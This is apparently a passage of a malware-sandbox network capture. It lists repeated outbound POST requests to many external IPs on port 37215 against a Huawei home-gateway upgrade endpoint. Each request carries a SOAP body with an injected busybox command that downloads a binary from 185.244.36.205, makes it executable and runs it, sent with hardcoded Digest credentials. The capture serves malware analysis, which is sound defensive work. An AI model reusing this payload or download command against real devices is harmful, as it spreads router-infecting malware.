                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1216192.168.2.153394231.178.108.24437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396353006 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1217192.168.2.1544366167.157.111.23837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396372080 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1218192.168.2.155991094.172.169.12937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396390915 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1219192.168.2.155955631.58.183.18437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396403074 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1220192.168.2.1549080190.39.36.9037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396425009 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1221192.168.2.1547988186.193.124.12037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396441936 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1222192.168.2.1545176156.101.230.13037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396464109 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1223192.168.2.155256027.124.127.14737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396506071 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1224192.168.2.1549908181.11.10.5737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396506071 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1225192.168.2.1541876102.94.241.15037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396514893 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1226192.168.2.1542746197.201.65.1837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.396543026 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
